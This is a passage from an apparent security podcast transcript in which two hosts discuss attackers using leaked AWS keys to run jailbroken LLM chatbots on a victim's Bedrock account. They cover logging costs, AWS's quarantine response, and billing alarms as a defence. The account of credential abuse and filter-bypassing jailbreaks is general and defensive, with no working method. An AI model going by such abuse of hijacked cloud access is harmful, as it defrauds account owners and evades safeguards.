Matthew: It was very tawdry. It apparently only took minutes for attackers to find the key and log in. Holy crap. They might be exaggerating for the story, but I guess it wouldn't surprise me. AWS does not enable prompt logging by default. So apparently this company had worked with some other companies that had LLM [00:43:00] break ins, but they couldn't tell what they were doing because AWS didn't enable the prompt logging.
And they said it was quite expensive in the article.
David: Yeah, but they wouldn't specify. They said their experiment cost them 3, 500. That's what AWS charged them while this was going on in there. Their LLM was being abused. And some of that cost was 75, 000 LLM invocations. The rest was from logging. And because they didn't list the ratio, I kind of got the impression that the bulk of that 3, 500 cost was actually the cost of the logging.
Matthew: Yeah, I agree. It did feel like it was implied that way. So the previous folks who had this happen didn't know what the attackers were doing. They just saw the attackers were using it. I don't, I don't know. The question is, is the process, is it expensive because of the processing? Is it expensive because of the storage or is it expensive just because they don't want people to do it?
David: Yeah,
Matthew: I don't know.
David: well, I'm wondering if that, you know, if it's because of the storage, I'm wondering if you could [00:44:00] simply minimize the storage and ship the logs out, if that would keep the cost to a manageable level.
Matthew: Maybe. I don't know.
David: But they're not going to tell you why they're charging you the cost though. So we don't really know if it's any one of these things.
Matthew: That's true. So, apparently the attackers are using prompts that use quote unquote jailbreaks to allow the models to respond without content filtering. And this is, I think, the best way to run a business. You're using someone else's infrastructure.
David: It's genius.
Matthew: This is genius.
David: I thought it was interesting, though, that AWS is actively looking for compromised AWS keys. To quote the article AWS quickly and autumn, I'm sorry to quote the article, which is quoting a statement from AWS AWS quickly and automatically identified the exposure and notified the researchers who opted.
not to take action. We then identified suspected compromised activity and took additional action to further restrict the account, which stopped the abuse.
Matthew: [00:45:00] Hmm.
David: And AWS says that flag credentials can't be used to create or modify modify authorized accounts or spin up new cloud resources. And the, the author reached out to AWS, And AWS responded by, by including Bedrock in the list of services that will be quarantined from now on in the event of an AWS or key pairs found compromised or exposed.
Matthew: feels a lot different.
David: Yeah, I mean, based on that, it sounds like AWS, it seems they're kind of poo pooing AWS, but AWS has come a long way if they're doing these things from the old days to actively help customers minimize the damage of an account takeover.
Matthew: Yeah, this is, all right, I realize actually in our notes we didn't describe exactly what the bots are doing, which I don't think I want to. It's pretty bad. It is definitely stuff That you are not going to want to have your business associated with apparently there's a website that sells [00:46:00] the interactions with these bots for up to like five bucks a month or something.
And that's also probably why they host them on other people's resources, because if they hosted them on resources that they were paying for, they'd probably get kicked off the services real quick.
David: Right. Well, I mean, because they're jailbreaking them, quote unquote, by, by fronting the prompts, that probably violates terms of service anyway.
Matthew: Yeah, so this is, this is the type of service that is, if it's not illegal, it's going to be illegal. I can't, I can't imagine this is not, I mean parts of it don't sound illegal, but parts of it anyways. All right, so no great insights here for me. Just thought it was incredibly disturbing and interesting how creative attackers can be.
And like I mentioned a minute ago, you definitely don't want to have your business associated with this type of thing.
David: yeah, you, one thing I thought you might be able to do is set up some Google alerts for your company. Because I thought of that when the the chatbot vendor in the article that's mentioned in the article had removed or took some [00:47:00] actions after the story broke. So I was thinking that, well, how could they have found out so quickly?
I doubt they read Krebs.
Matthew: okay. They doubt they
David: doubt they read Krebs,
Matthew: It's
David: Well, I mean, they have a chat bot, so they obviously know how to read. But I don't think they read, read Krebs. So they may have some, you know, Google alerts or something set up to notify them that someone's talking about their company. So that might not be a bad idea to do that for your own company.
Because something like this may be happening and you may not even hear about it.
Matthew: Yeah, I don't. So, so, hmm. Yeah, I don't know how, I don't know how you find out about this in any reasonable way, like, because if you don't have the logging turned on and you don't have, you know, you don't have anything like statistical based alerts on your usage, you're like, wow, our LLM usage is way up, you know, must be those marketing folks must be using it a lot or something like that.
Or the [00:48:00] research folks are using it a lot and you don't have that turned on and someone's just kind of quietly using it and nobody comes and tells you about it. Like you could just be paying an extra couple of thousand or tens of thousands of dollars for the foreseeable future. Yeah.
David: that's the key is to know what the logging capabilities are in AWS and to have your billing alarms set up so you can recognize this stuff when it's, you know, when something out of the, out of the, out of the norm happens.
Matthew: If your bill doubles from month to month and you don't have a corresponding doubling or increase in revenue or yeah. You need to look at that and be like, what's going on here, buddies. All right. Well, that looks like that's all the articles we have for today. Thank you for joining us. Follow us at Serengeti Sec on Twitter.
And, you know, maybe we'll talk about you in a future episode, subscribe on your favorite podcast app.
[00:49:00]